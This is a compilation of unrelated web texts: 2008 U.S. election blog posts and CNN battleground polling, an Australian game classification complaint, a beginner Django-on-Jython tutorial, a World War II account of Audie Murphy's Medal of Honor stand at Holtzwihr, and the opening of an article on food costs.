Registered Democrats outnumber Republicans by more than 1.1 million , about twice the gap in 2004 , state figures show .
What ’s more , prominent Republicans worry that McCain ’s message is flawed or is being drowned out by waves of Obama ads .
The New York Times :
People are scratching their heads :
Why is Senator John McCain here ?
Senator Barack Obama has a double - digit lead in recent Pennsylvania polls .
Senator John Kerry beat President Bush here in 2004 .
The previous three Democratic presidential candidates won , too .
And this year there are 1.2 million more registered Democrats than Republicans in the state .
But in these frantic last weeks of the 2008 campaign , Mr. McCain has lavished time and money on this now deep - blue state — he made three stops here on Tuesday — as if his political life depended on it .
And , from his campaign ’s point of view , it does .
“ We need to win Pennsylvania on Nov. 4 , and with your help — with your help — we ’re going to win ! ”
Mr. McCain shouted to the crowd in his first appearance of the day , at a manufacturing plant in Bensalem , north of Philadelphia , where he said that Mr. Obama would raise their taxes and was too untested to handle an international crisis .
Mr. McCain ’s strategists insisted that the state and its 21 electoral votes were within reach and crucial to what they acknowledge is an increasingly narrow path to victory .
They say that their own polls show Mr. McCain only seven or eight percentage points behind Mr. Obama .
( The state polls that show Mr. Obama with a double - digit lead , all conducted in recent weeks , include surveys by Marist , Quinnipiac , Rasmussen , SurveyUSA and The Allentown Morning Call . )
Keep it up , McCain campaign .
QUICK UPDATE @ 9:10 a.m. : I ’m watching MSNBC .
NBC ’s Kelly O’Donnell travels with McCain — and is pretty much a McCain campaign spokesperson .
The McCain people told O’Donnell that their polls show movement towards McCain .
No one else is seeing it , but O’Donnell seems to believe it because surely no one on the McCain campaign would ever lie .
And , Kelly wants us to know that McCain has spent an awful lot of time in New Hampshire .
O’Donnell is one painful reporter .
All she does is regurgitate McCain talking points .
ANOTHER UPDATE : Here ’s the Pollster.com chart .
It ’s worse for McCain than Iowa :
McCain - Palin campaign expenditure reports filed this week show that , despite McCain 's prior bias against anyone having makeup plastered on like a trollop , he paid American Idol make - up artist Tifanie White $ 8,672.55 in September and $ 5,583.43 in August .
But as these side - by - side pictures of McCain from March of this year and this week prove , it was money well spent .
Tifanie has some mad skills if she can make that kind of foundation look natural in sunlight .
[ Washington Post ]
Advertisement
F.E.A.R. 2 Is So Banned ( In Australia )
Surprise , Australia !
A game featuring horror elements and a bit of the ol ’ tomato sauce has been “ refused classification ” in Australia , which is as good as a ban .
Know what ’s so maddening , both as an Australian and a fan of common sense ?
It ’s not the fact the country lacks an R18 + rating .
That issues been argued to death .
No , it ’s the inconsistency .
Silent Hill , and now this , get the chop because ( presumably in this case , since we do n’t know exactly why ) they ’re violent horror games .
And yet Gears of War 2 gets the OK when you are at times literally swimming in blood .
[ OFLC , thanks Travis ! ]
Getting Started with Django - My Experiences
Submitted By : Josh Juneau
Introduction
You may ask why we need another web framework , or what a different web framework may do to make my applications or development life cycle better .
Obviously the developers of the Django web framework had some key goals in mind when they set upon their journey to create Django .
I believe that their goal was simplicity and ability .
These are two of the key factors that come into play for many of today 's web frameworks .
Ruby on Rails was the one of the pioneers in this area .
Not long after , many other great application development languages came up with similar powerful frameworks .
For example , Grails is also gaining momentum in the Groovy / Java developer community .
Now we come to Python , one of the most sexy , powerful , and easy to learn object oriented languages of our time .
Of course we have some great web frameworks for Python .
Pylons and Django are just a couple .
Now let 's port those into the Jython arena and sprinkle a bit of Java into the Python mix to create some very attractive web frameworks .
Django does not disappoint , and I 'd like to argue that it is one of the leading frameworks in the simplicity and ability arena .
Let 's dig into some basics with Django and find out what makes this framework so appealing .
This article is meant for the Django beginner .
More importantly , we will cover basics for getting started with Django development with Jython .
Rather than develop a separate set of examples for getting started , we will follow the Django documentation and I 'll add extra information as needed .
I hope to pick up with more advanced topics in future articles , so please stay tuned to the Jython Monthly distribution for more details .
Getting Ready to Tango with Django
First things first , we have to set up our environment .
For those of you who would like to follow along , please be sure to download the following before continuing :
- The latest Jython distribution ( 2.5 alpha 3 at the time of this writing )
http://www.jython.org
- Django ( 1.0 at the time of this writing )
http://www.djangoproject.com/
- django - jython libraries
http://code.google.com/p/django-jython/
You will want to install all of these and ensure that the they reside in your classpath .
Please visit the Django on Jython documentation for more details on setting up your environment .
Since we are using Jython , we can run our Django application on any Java servlet container .
We can also mix any Java library into our application as needed ... this is one of the most powerful reasons to use Django on Jython .
Database
Many of the major databases are supported at this time .
However , there are a few that will not yet function with the Django framework on Jython .
For instance , you will have to use an alternative to the DB2 database at this time .
For more information , please take a look at the django - jython site .
For the purposes of this article , I am advocating the Postgresql database to start out with Django .
In order to make Postgresql work with Django in the Python world , you must install the psycopg package ( bindings ) .
However , we have a bonus as Jython developers as this package is not required to run Django with Postgresql on Jython .
Instead , for the database engine we simply specify " doj.backends.zxjdbc.postgresql " within the settings .py module .
Creating the Project and Models
Create Project
The first step in creating a Django application is to choose a location in which to store your code .
Create a directory somewhere on your hard disk , and then open a command prompt or terminal .
Change directories until you are positioned within your newly created directory .
You also need to ensure that the jython and Django executables are in your CLASSPATH .
Once you 've ensured this information you are ready to begin creating your project .
jython django - admin.py startproject mysite
When you " cd " into the newly created " mysite " directory , you will see the following three important Jython files :
manage.py - Command - line utility for managing Django project settings.py - Configurations for the Django project urls .
py - URL settings for the Django project
You now have created a fully functional project .
You can start the test server now to ensure that everything is functional by issuing the following command :
jython manage .py runserver
You will see the following output :
Validating models ... 0 errors found Django version 1.0 - final - SVN - unknown , using settings ' mysite3.settings '
Development server is running at http://127.0.0.1:8000/
Quit the server with CONTROL-C .
You can optionally specify a different port by appending the port number that you wish to use after the runserver command .
Database Setup
If you have n't already done so , create your Postgresql database for the test application at this time .
Simply name the database test and create a user that we will use for our application to access the database .
In order to setup the database for the project , you must edit the settings .py module .
Remember , I am going to use the Postgresql database for the purposes of this article , but feel free to choose another if it is supported .
You will need to change the following settings for the database :
DATABASE_ENGINE = ' doj.backends.zxjdbc.postgresql'
# Our Jython Django Postgresql bindings DATABASE_NAME = ' test ' #
Or path to database file if using sqlite3 .
DATABASE_USER = ' username ' #
Not used with sqlite3 .
DATABASE_PASSWORD = ' passwd ' #
Not used with sqlite3 .
DATABASE_HOST = '' #
Set to empty string for localhost .
Not used with sqlite3 .
DATABASE_PORT = '' #
Set to empty string for default .
Not used with sqlite3 .
As the Django tutorial points out , it is a good idea to take a note of some other sections of the settings .py file at this time .
Look at the following INSTALLED_APPS which are automatically included in your project for convienence :
django.contrib.auth --
An authentication system .
django.contrib.contenttypes --
A framework for content types .
django.contrib.sessions -- A session framework .
django.contrib.sites --
A framework for managing multiple sites with one Django installation .
In order to create the tables for your database , run the following command :
jython manage .py syncdb
Once you issue the command above , you should see the following output which will prompt you to enter information for creating a superuser account .
It is important to do so at this time or you will need to take extra measures in order to create one later .
Simply follow the directions as they are displayed in the terminal or command line .
Creating table auth_permission Creating table auth_group Creating table auth_user Creating table auth_message Creating table django_content_type Creating table django_session Creating table django_site
You just installed Django 's auth system , which means you do n't have any superusers defined .
Would you like to create one now ?
( yes /no ) :
Create Models
At this point , the Django project is set up and we are ready to create an application within it .
In the Django environment , a project can contain one or more applications .
For the purposes of this article , we will create the same application as the Django tutorial so that it is easier to follow along if you choose to do so .
In this case , we are interested in creating an application which manages poll questions and answers .
The first step is to create the application itself .
As stated above , we have create the project thus far but no application as yet .
To do so , ensure that you are within the project mysite directory and issue the following command :
jython manage .py startapp polls
As you can see , the manage .
py script plays an important role in constructing our Django projects / applications .
At this point you should list the contents of the newly created polls directory and see that two jython modules have been created : models .py and views .py .
These two modules are going to play an important role in the development and construction of our application model and view ( obviously ) .
As we continue to follow the Django tutorial , the next step is to open up the models .
py file and edit the contents so that they look like this :
from django.db import models class Poll( models .
Model ) : question = models .
CharField( max_length=200 ) pub_date = models .
DateTimeField ( ' date published ') class Choice ( models .
Model ) : poll = models .
ForeignKey ( Poll ) choice = models .
CharField( max_length=200 ) votes = models .
IntegerField ()
This simply creates two classes which represent the Poll object itself and the Choice object for each poll .
To learn more about the details of the syntax used for these classes , please take a look at the Django tutorial .
For now , it is important to know that with this little bit of code , our application now has the information required to create database tables and views for controlling our Poll .
In order to have the application included in our Django project ( mysite ) , we need to adjust the the settings .py module a bit by adding the application to the list of INSTALLED_APPS .
Open settings.py and go to the bottom of the file , adjust as follows :
INSTALLED_APPS = ( ' django.contrib.auth ' , ' django.contrib.contenttypes ' , ' django.contrib.sessions ' , ' django.contrib.sites ' , ' mysite.polls ' )
Django now knows about our application and it can create the SQL required for our database objects as well as perform the work of creating the objects itself .
In order to see the SQL that is required to create the objects for our database , issue the following command from within the mysite directory :
jython manage .py sql polls < < output >>
BEGIN ; CREATE TABLE " polls_poll " ( " id " serial NOT NULL PRIMARY KEY , " question " varchar ( 200 ) NOT NULL , " pub_date " timestamp with time zone NOT NULL ) ; CREATE TABLE " polls_choice " ( " id " serial NOT NULL PRIMARY KEY , " poll_id " integer NOT NULL REFERENCES " polls_poll " ( " id " ) DEFERRABLE INITIALLY DEFERRED , " choice " varchar ( 200 ) NOT NULL , " votes " integer NOT NULL ) ; COMMIT ;
In order to actually have Django create the objects , we use the following command from within the mysite directory :
jython manage .py syncdb << output >>
Creating table polls_poll Creating table polls_choice Installing index for polls .
Choice model
You can now look at the database and see the objects that have been created .
Working with the Framework
At this point you can begin to work with the framework at the shell level if you choose to do so .
You can use the following command to get into the shell and then follow some of the , http://docs.djangoproject.com/en/dev/intro/tutorial02/#intro-tutorial01
Django documentation ] at the bottom of tutorial 1 to work with the model .
Working with the model through the shell will help you to understand how the Django framework functions .
Delving into the Administrative Controls
In order to actually see your site up and running , you will need to activate the administrative controls .
In my belief , this is one of the most powerful features of the Django framework .
Years ago I began creating websites for clients that had all content stored in a database .
I then created an administrative interface for the clients to use so that they could update the website content ( the database content ) at any time via a nice WYSIWYG editor .
It is a great framework and the clients really enjoy using it to administer their sites .
The Django framework gives you an administrative interface for free with each application you create .
All site content is stored in the database , so it can all be updated via the use of the administrative console .
Cascading style sheets can also be added and modified to change the look and feel of the site .
If you follow the Django Framework Tutorial 2 , it will guide you into the right direction for creating and adjusting the administrative site .
In this article , I will show you how to get started .
As the tutorial explains , the administrative site is not enabled by default .
You must perform a few simple measures in order to activate the site .
Follow the next few procedures to set up the administrative console for your Django website .
1 ) Add ' django.contrib.admin ' to the settings .
py INSTALLED_APPS setting .
It should now resemble the following :
INSTALLED_APPS = ( ' django.contrib.auth ' , ' django.contrib.contenttypes ' , ' django.contrib.sessions ' , ' django.contrib.sites ' , ' mysite.polls ' , ' django.contrib.admin' )
2 ) Create a file named admin.py within your polls directory .
Add the following to admin.py in order to register the Poll object to the administrative site :
from mysite.polls.models import Poll from django.contrib import admin admin.site.register( Poll )
3 ) Synchronize your data by running :
jython manage .py syncdb
4 ) Edit the urls .py file to resemble the following in order to allow access to the appropriate modules within your site :
from django.conf.urls .defaults import * #
Uncomment the next two lines to enable the admin : from django.contrib import admin admin.autodiscover ( ) urlpatterns = patterns ( '' , # Example : # ( r'^mysite / ' , include ('mysite.foo.urls ' ) ) , # Uncomment the admin/doc line below and add ' django.contrib.admindocs ' # to INSTALLED_APPS to enable admin documentation : # ( r' ^admin/doc / ' , include ( 'django.contrib.admindocs.urls ' ) ) , # Uncomment the next line to enable the admin : ( r'^admin / ( .* ) ' , admin.site.root ) , )
You can now start your application and log into it using the superuser account that you had created at the beginning of this article .
jython manage .py runserver
Please follow the Django Framework Tutorial 2 for more information on using the administrative site .
Use the following URL to log into your administrative site :
http://127.0.0.1:8000/admin
Conclusion
The Django framework slogan is ' The web framework for perfectionists with deadlines ' .
I must agree that Django helps to speed the process of generating web based applications .
Although we did not get into an of the meat an potatoes in this article , hopefully the quick demo that was covered is enough to entice you into learning more about the framework .
I am a Django newbie myself , and I find the development lifecycle of a Django web application to be very appealing .
This would be especially true if there were IDE support for Django on Jython ( it will be here soon ) .
Until then , we can muddle through working with Django from terminal or command prompt ... it is still easier than setting up a simple EJB application ... although both EJB and Django have their own places in the world .
I hope to cover more details about the Django framework in future articles .
References
Leo Soto -
Thanks for your assistance !
Django Project
LET’S DEFINE ‘ WORKING CLASS ’….
As a rule , I do n’t care about politicians ’ personal wealth ; I just do n’t see how it tells us anything useful about them .
I can think of some pols who ’ve enjoyed enormous personal wealth — the names Kennedy and Roosevelt come to mind — but went on to represent the needs of those who were far less fortunate .
I do care , however , when wealthy politicians pretend to be struggling to help the rest of us “ relate ” to them on a personal level .
John McCain recently launched a television ad , for example , that told voters , “ Life in the spotlight must be grand , but for the rest of us times are tough . ”
For McCain , though , times are n’t tough — he ’s extremely wealthy , and owns seven homes and 13 cars .
“ Us ” does n’t apply .
Similarly , Sarah Palin said yesterday :
“ I know what Americans are going through .
Todd and I , heck , we ’re going through that right now even as we speak , which may put me again kind of on the outs of those Washington elite who do n’t like the idea of just an everyday working class American running for such an office . ”
I ’m afraid it ’s pretty difficult to see Palin as an “ everyday working class American . ”
A check of financial records , though , shows the Palins live anything but a common life when compared with their fellow residents of their hometown of Wasilla .
Their combined income of nearly a quarter - million dollars last year was five times the median household income for Wasilla ’s 7,000 residents .
They own a single - engine plane , two boats , two personal watercraft and a half - million - dollar , custom - built home on a lake that is worth three times the average of other homes in town .
And what ’s wrong with the Palins living well ?
Not a thing .
I could n’t care less .
But I do care about the dishonesty .
If you ’re pulling in a quarter - mil , own a plane and two boats , and live in a half - million - dollar , custom - built lake house , do n’t have the audacity to call yourself “ an everyday working class American , ” and then whine about the condescension of the “ Washington elite . ”
WASHINGTON ( CNN ) --
Polls in five key battleground states in the race for the White House released Tuesday suggest that Sen. Barack Obama is making major gains .
Democrat Barack Obama , left , is gaining ground on Sen. John McCain in some Republican strongholds .
The CNN / Time magazine / Opinion Research Corp. polls of likely voters in Indiana , New Hampshire , North Carolina , Ohio and Wisconsin reflect a significant nationwide shift toward the Democratic presidential nominee .
Obama has made significant strides in New Hampshire , the state credited with reviving Sen.
John McCain 's Republican primary campaign in both 2000 and 2008 .
Fifty - three percent of New Hampshire 's likely voters are backing Obama , while 45 percent are supporting McCain .
Obama held a lead of 5 percentage points in the last CNN New Hampshire poll , taken in early September .
Watch what the poll numbers mean »
Four years ago , Sen. John Kerry narrowly carried New Hampshire -- a one - time GOP stronghold .
George W. Bush squeezed out a slender win by 1 percentage point in 2000 .
iReport.com :
Are you in a battleground state ?
Share your story
In Indiana , 51 percent of likely voters say McCain is their choice for president , with 46 percent backing Obama , a Democratic senator from neighboring Illinois .
Indiana went for Bush by 21 percentage points four years ago ; Democrats have not carried Indiana since 1964 .
See the latest polling
Presidential Debate Nashville is the battleground as the candidates face off in their second debate .
Do n’t miss a minute of the action !
Tonight , 9 p.m. ET see full schedule »
In North Carolina , the two major party nominees are locked in a dead heat , with McCain and Obama each claiming the support of 49 percent of likely voters .
" Obama 's strongest region is in the Raleigh / Durham area , " said Keating Holland , CNN 's polling director .
" McCain does best in Charlotte and the surrounding counties . "
The last Democrat to carry North Carolina was Jimmy Carter , a Southerner , in 1976 .
The state 's 15 electoral votes are considered critical for any successful Republican presidential campaign .
McCain trails Obama in Ohio ; 50 percent of likely voters favor Obama , while 47 percent support the senator from Arizona .
No Republican has won the White House without carrying the state .
" McCain has a 6 - point lead in the Cincinnati area , " Holland said .
" But a GOP candidate normally needs to do better than that in southwestern Ohio in order to win the state .
And overall , Obama actually has a 2 - point edge among suburban communities across the state . "
In Wisconsin , which has n't voted Republican since 1984 , Obama is holding a 51 percent to 46 percent lead among likely voters .
" Obama continues to maintain a ' home field advantage ' in the southern Wisconsin counties that border Illinois , " Holland said .
" He has nearly a 30 - point lead in the city of Milwaukee , although he loses the Milwaukee suburbs by nearly as large a margin . "
The new polls are behind several shifts in the CNN Electoral College map .
CNN is shifting North Carolina from leaning toward McCain to a tossup .
CNN is moving Wisconsin and its 10 electoral votes , and New Hampshire and its four electoral votes , from tossup to leaning toward Obama .
Finally , CNN is switching Michigan and its 17 electoral votes from leaning toward Obama to safe for Obama .
The McCain campaign announced last week that it was shifting its resources out of the once hotly contested industrial state , instead intensifying efforts in Pennsylvania and Ohio .
With these moves , CNN estimates that if the presidential election were held today , Obama would win states with 264 electoral votes and McCain would carry states with 174 electoral votes , with 100 electoral votes still up for grabs .
To win the White House , 270 electoral votes are needed .
See CNN's Electoral College map
Obama 's lead has expanded by 29 electoral votes in comparison with his margin in CNN 's last electoral map , which was released on October 1 .
The CNN / Time / Opinion Research polls were conduced October 3 - 6 , with 677 likely voters in Indiana , 813 likely voters in New Hampshire , 666 likely voters in North Carolina , 749 likely voters in Ohio and 859 likely voters in Wisconsin .
Respondents were all questioned by telephone .
The survey 's sampling error is plus or minus 3.5 percentage points in New Hampshire , Ohio and Wisconsin , and plus or minus 4 percentage points in Indiana and North Carolina .
All About John McCain • Barack Obama
On a frigid January afternoon in 1945 , Company B , 15th Regiment , 3rd Infantry Division , was attacked on the outskirts of Holtzwihr , France , by six tanks and an estimated 250 German infantrymen , who were determined to wrest the Bois de Riedwihr from the Americans .
Certain that his decimated company could not withstand the German onslaught , First Lieutenant Audie L. Murphy ordered his men to fall back to safety deep in the forest .
After expending all his carbine ammunition at the enemy , Murphy himself prepared to fall back .
Suddenly , he spotted a .50 - caliber machine gun on the turret of a burning tank destroyer .
Knowing that his position had to be held at all costs , Murphy climbed on top and began firing the machine gun at the oncoming Germans .
Native Texan Murphy , destined to become a postwar film star , made his courageous stand during the Colmar offensive , which eventually drove the Germans from their last foothold on French soil .
The 3rd Infantry Division ’s role in the offensive was to advance near the Bois de Riedwihr , a large forest in the northern sector of the Colmar Pocket that stretched between the heavily fortified villages of Riedwihr and Holtzwihr .
Lieutenant Colonel Keith Ware , executive officer of the 15th Regiment , later recalled how imperative it was to secure the forest , explaining , ‘ Its possession was of cardinal importance , as the woods dominated the German stronghold of Holtzwihr , the reduction of which was essential to the prompt accomplishment of the 3rd Division ’s offensive tasks .
On January 23 , the 30th Regiment , 3rd Infantry Division , captured the woods and reached the outskirts of Holtzwihr and Riedwihr , where the Americans encountered 10 enemy tanks and tank destroyers accompanied by at least 100 infantrymen .
The result was disastrous .
Without cover and unable to dig foxholes in the frozen earth , the American unit was cut to pieces .
Shattered , understrength and badly disorganized , the 30th was forced to withdraw from the Bois de Riedwihr .
The 15th Regiment was ordered to retake that same ground the next day .
The subsequent fighting was so furious that the regiment ’s Company B , among others , was decimated .
With the exception of Lieutenant Murphy , all the officers were killed , and 102 of the company ’s 120 enlisted men were either killed or wounded before they even reached their assigned position .
By midnight on January 25 , Company B had penetrated 600 yards into the woods and was in position north of Holtzwihr .
Within the hour fresh supplies reached the weary survivors of Company B .
After the men were resupplied , they were ordered to move up to the south end of the woods , facing the village of Holtzwihr , and hold the line until relief came .
Advancing through snowy darkness in the early morning hours , the men reached their assigned position before dawn .
Once there , the weary GIs began a futile attempt to dig foxholes in the frozen ground .
Murphy later recalled his men ’s frustration :
This night seemed unusually long and the snow colder than I ever dreamed it could be .
The sound of picks on frozen ground beat against my eardrum like mad .
The 18 men left in Company B had been digging in that goddamned snow covered granite and the only benefit received from it was the exercise , which kept them from becoming stiff and immobile with the cold .
And even when one stopped digging it was necessary to walk about to keep your feet from freezing .
Murphy , who had taken over the depleted company during the night , feared a dawn attack and was concerned that his men could not stand up to an assault .
Strange , but it seems dawn breaking means more than any other time of the day or night , to an infantryman , he said of that suspense - filled evening .
It is an accepted time to attack or be attacked .
Mercifully , as the overcast dawn broke , two M10 tank destroyers from Lt. Col.
Walter E. Tardy ’s 601st Tank Destroyer Battalion arrived just in time to support Company B ’s position .
But to the relief of Murphy and his men , the Germans did not attack at daybreak .
Murphy took advantage of the unexpected lull to begin forming his lines , using one tank destroyer and five armored vehicles from the 3rd Reconnaissance Troop to protect his right flank .
Company A connected loosely with his left flank .
The second tank destroyer selected a position approximately 40 yards ahead of the lines .
Murphy then set up his command post in a drainage ditch 10 yards in front of the rear tank destroyer .
He maintained contact with battalion headquarters , a mile to the rear , by a field phone .
Company B was stretched across a butt - end of a large ` U ’ whose sides were formed by two great fingers of trees that led toward Holtzwihr , Murphy recalled .
The heavily fortified village was now in plain view over the rolling , snow - covered fields .
The two tank destroyers sat astraddle a narrow dirt road that ran deep into the woods .
Murphy knew German armor would have to advance along the roadway .
Early in the afternoon , he phoned back to 1st Battalion headquarters for last - minute instructions .
He was informed that the 2nd Battalion , 30th Regiment , had not yet arrived to reinforce his company .
Hold your position were his orders .
At 1400 hours on January 26 , 1945 , German armor and infantry moved out from Holtzwihr , preceded by an artillery barrage .
From my forward shallow emplacement I saw the counterattack forming with six tanks and about 250 foot soldiers garbed in white suits , Murphy recalled , so it would ’ve been impossible to spot them sooner or any farther away than a mile .
I alerted the men and ran for the field phone and called the artillery officer at battalion headquarters and arranged for 2nd Battalion to fire .
I no sooner gave the order to fire than all hell broke loose .
The Germans had started their preliminary barrage .
Private First Class Donald Eckman remembered :
You could see the pennants on the antenna of the German tanks ….
That got our attention right away … .
We also saw a huge sea of white infantry coming toward us .
The infantry belonged to the German 2nd Mountain Division , which had been transferred to the Colmar region from Norway .
The men had been trained for operations in mountainous terrain .
Individual companies of this division were brought down from Norway and fed into the lines as soon as they arrived .
By committing this elite division to action at Holtzwihr , the German commanders demonstrated how vital they believed it was to hold a bridgehead west of the Rhine .
The German tactical objective was to gain control of the road that led from Holtzwihr through Murphy ’s position and into the woods beyond the regimental headquarters .
If successful , the enemy attack would clearly threaten the 3rd Division ’s entire position .
Murphy recognized the importance of holding the road at all costs .
Once the enemy came within range , Tardy ’s tank destroyers opened fire .
Unfortunately , their 90 mm shells bounced harmlessly off the steel sides of the oncoming German armor .
I saw the enemy tanks get direct hits , said Murphy , but the rounds proved ineffective against the heavily armored German tanks .
Advancing and firing viciously , they knocked out a Company B machine - gun crew .
Then the rear tank destroyer was hit by an 88 mm shell that pierced its thin armor and killed the commander and gunner .
The surviving crew members scurried out and retreated into the woods .
Undaunted , the crew in the lead tank destroyer , after surviving several close calls , mounted an attack on its own .
Staff Sergeant Joseph Tardiff and Corporal Robert Hines simultaneously blazed away with .50 - and .30 - caliber machine guns , cutting down the oncoming enemy infantrymen .
Suddenly , however , the crew lost control of the tank destroyer when they tried to maneuver into a better firing position .
The vehicle slid off the road and into a drainage ditch , leaving its main gun at a useless angle that prevented it from being trained on the enemy .
Stuck fast in the ditch , the tank destroyer became a sitting duck for German fire .
The crew climbed out and hastily retreated to the forest .
With both American tank destroyers out of action and large enemy infantry and armored forces moving on his position , Murphy realized that the remnants of his company could hold out no longer .
He ordered his men to fall back to safety deep in the forest while he stayed behind , directing artillery fire .
Private First Class Irving Kelly was reluctant to leave Murphy .
I remember being mad as hell when Murph told us to go back , Kelly recalled .
We wanted to stay and fight by his side .
I remember vividly that Sergeant Harold Corl and myself were the last two to leave .
Due to a technical problem with forward observer 1st Lt. Walter Weispfenning ’s radio , Murphy remained at his post , directing artillery fire over the field telephone .
It was not a heroic act , said Murphy .
I figured if one man could do the job , why risk the lives of others .
He ordered fire directly on top of the advancing Germans , communicating target instructions to 1st Battalion headquarters while at the same time shooting at the enemy infantry with his carbine .
I loved that artillery , Murphy recalled .
I could see Kraut soldiers disappear in clouds of smoke and snow , hear them scream and shout , yet they came on and on as though nothing would stop them .
The Germans had advanced to within 50 yards of Murphy when a nervous lieutenant from battalion headquarters inquired about the enemy ’s position .
Murphy replied ,
If you just hold the phone a minute , I ’ll let you talk to one of the bastards .
After exhausting his carbine ammunition , Murphy was preparing to fall back when the .50 - caliber machine gun on the turret of the burning tank destroyer caught his eye .
Soon the fire would reach the vehicle ’s fuel and ammunition , but Murphy knew the gun was his only chance to stop the Germans .
He climbed aboard the tank destroyer and began spraying the big .50 - caliber at the enemy .
Private First Class Anthony V. Abramski later reported , I saw Lt. Murphy climb on top of the burning tank destroyer while bursts of machine pistol fire from the advancing infantry battered against the hull and tread .
Murphy knew that the .50 - caliber would have no effect on the tanks , so he concentrated his fire on the advancing infantry .
I would not waste my ammunition on something that direct hits by 90 mm shells could not slow down , he said .
I concentrated on the foot soldiers , believing that the tanks would not advance very far without them .
Private Charles Owen , one of the 18 men left in Company B , watched in awe as Murphy raked the oncoming enemy .
Boy , he was effective on that .50 - caliber , said Owen .
I do n’t know whether he ’d ever had .50 - caliber training or not .
But the Germans were deathly afraid of .50 - calibers ; they had armor- piercing capabilities .
Another observer , Sergeant Elmer Brawley , who witnessed the engagement from the fringe of the woods , added , The German infantrymen got within 10 yards of Lieutenant Murphy , who killed them in the draws , in the meadows , in the woods –wherever he saw them .
Murphy ’s deadly fire on the supporting infantry eventually forced the tanks to return to an area in front of the woods .
These tanks added their murderous fire to that of the Kraut artillery and small - arms fire that showered the lieutenant ’s position , Brawley said .
The billowing smoke from the tank destroyer , combined with the constant roar of battle , prevented the Germans from detecting where the machine - gun fire was coming from .
According to Murphy ,
With all the crackle of firearms and big shells exploding all around , they probably did n’t even hear my machine - gun fire , much less guess its point of origin .
Although the smoke provided some concealment , it also interfered with Murphy ’s visibility , which allowed some enemy soldiers to creep up unnoticed on his right flank .
He wrote :
When I first saw them , they had stopped in the drainage ditch directly in front of me and were frantically discussing something .
I pressed the trigger and slowly traversed the barrel –the bodies slumped in a stack position .
Suddenly , two 88 mm shells slammed into the tank destroyer .
The concussion and shock of the explosion threw Murphy violently against the turret , nearly knocking him to the ground .
Lieutenant Murphy was enveloped in clouds of smoke and spurts of flame , Weispfenning recalled .
Miraculously , Murphy managed to maintain his composure and continued to fire the machine gun .
The only time he stopped firing was when he had to reload or relay firing instructions to artillery .
Years later , displaying his characteristic dry wit , Murphy remarked : I remember getting the hell shook out of me , but that was nothing new .
I also remember for the first time in three days my feet were warm .
Amazingly , his luck continued to hold when the gray clouds broke long enough for American fighter - bombers to assemble above the raging battlefield .
After hearing the glorious sound of the approaching planes , Murphy had the artillery mark the German positions with smoke shells so the pilots could start strafing .
The enemy attack , although slowed , still pressed forward , however .
Once again , the infantry threatened to overrun the strongpoint , now held down by a single American .
In a daring move , Murphy continued to call for artillery fire , even though it was falling uncomfortably close to him by that time .
I figured that I could luck it out of that barrage if the Krauts could , he said .
With the renewed barrage , the Germans finally realized that someone had them zeroed in with artillery .
However , they still could not locate the source of the machine - gun fire that was cutting their ranks to pieces .
A small group of Germans managed to infiltrate the woods as far back as the 1st Battalion headquarters , but the majority of the enemy infantry began to fall back toward Holtzwihr .
Without the protection and support of the foot soldiers , the German armor wisely left the field .
I can understand why the Kraut infantry missed me , deadpanned Murphy .
But I can never forgive the German tank men for their poor marksmanship .
It was real sloppy .
Just as the Germans began to fall back , Murphy ’s field telephone went dead .
Exhausted and bleeding profusely , Murphy climbed off the burning tank destroyer and limped back into the forest .
I turned from the Germans and never looked back , he recalled .
I was too weak from fear and exhaustion to care anymore .
Shortly after reaching the woods , Murphy heard the tank destroyer blow up , blasting off the turret on which he had been standing .
Although steel and rock fragments riddled the field map that he had carried during the battle , Murphy had been incredibly lucky .
His trousers were soaked with blood from an old wound , suffered the previous October , that had been reopened in the course of his frenzied ordeal .
Murph was a daredevil ; he took chances that others just would n’t take , recalled Brad Croeker , a Company B private .
He was too daring for most of us .
His middle name was lucky .
Bill Weinberg added : I think he was just willing to stick his neck out .
But it was a matter of being careful , too .
He took more chances than others , but he did it in a calculated way .
When Murphy got back to his company , he helped organize a counterattack .
In sworn testimony , Sergeant Brawley stated : Lieutenant Murphy , refusing to be evacuated , led us in a strong attack against the enemy , dislodging the Germans from the whole area .
Murphy continued advancing until the men of Company B had reoccupied their original positions .
Frozen and exhausted , the GIs spent the rest of the afternoon holding their ground .
That night we lay among our dead comrades who fell that afternoon , Murphy said .
Croeker recalled :
We were right beside the Colmar Canal .
After that bloody day was over , we went down to the canal to get a drink … .
The bodies were so thick , you had to push them aside to get a drink of water .
Strengthened by replacements , the 3rd Battalion , 30th Infantry Regiment , captured Holtzwihr on January 27 .
The Germans , disheartened by their lack of progress against the Americans , pulled most of their men and materiel out of the area .
Except for small pockets of enemy resistance , the areas east of the Ill River and north of the Colmar Canal were clear of enemy forces by January 28 .
On June 2 , 1945 , Lt. Gen. Alexander Patch , commanding general of the Seventh Army , presented Lieutenant Murphy with the Medal of Honor .
The official citation reads in part :
For an hour the Germans tried every available weapon to eliminate Lieutenant Murphy , but he continued to hold his position … .
His directing of artillery fire wiped out many of the enemy ; he killed or wounded about 50 .
Lieutenant Murphy ’s indomitable courage and his refusal to give an inch of ground saved his company from possible encirclement and destruction and enabled it to hold the woods , which had been the enemy ’s objective .
Charles
Owen recalled years later :
He saved our lives .
If he had n’t done what he did , the Germans would have annihilated us .
We were already beat down pretty bad and about out of ammunition .
For Murphy , the Medal of Honor was the crowning achievement of an illustrious combat career .
By the end of the war , he had received every medal for valor that his country had to offer , including two Bronze Stars , the Distinguished Service Cross , two Silver Stars , three Purple Hearts and the Legion of Merit–making him the most decorated American soldier during World War II .
After the war , Murphy returned to Texas , but the reluctant hero was invited to Hollywood in September 1945 by actor James Cagney , who had seen his photo on the cover of Life magazine .
Murphy made more than 40 films , including To Hell and Back , The Red Badge of Courage and many Westerns .
On May 28 , 1971 , a private plane crashed outside Roanoke , Va. , killing the five people aboard , including passenger Murphy , 46 .
This article was written by Daniel R. Champagne and originally appeared in the May 2002 issue of World War II .
For more great articles subscribe to World War II magazine today !
How much does it really cost to eat a healthy diet ?
Economists , health researchers and consumers are struggling to answer that question as food prices rise and the economy slumps .
The World Bank says nearly a billion people around the world live on a dollar a day , or even less ; in the United States , the daily food - stamp allowance is typically just a few dollars per person , while the average American eats $ 7 worth of food per day .
Even middle - class people struggle to put healthful food on the table .
Studies show that junk foods tend to cost less than fruits , vegetables and other healthful foods , whose prices continue to rise .
This fall a couple in Encinitas , Calif. , conducted their own experiment to find out what it was like to live for a month on just a dollar a day for food .
Overnight , their diets changed significantly .
The budget forced them to give up many store - bought foods and dinners out .
Even bread and canned refried beans were too expensive .
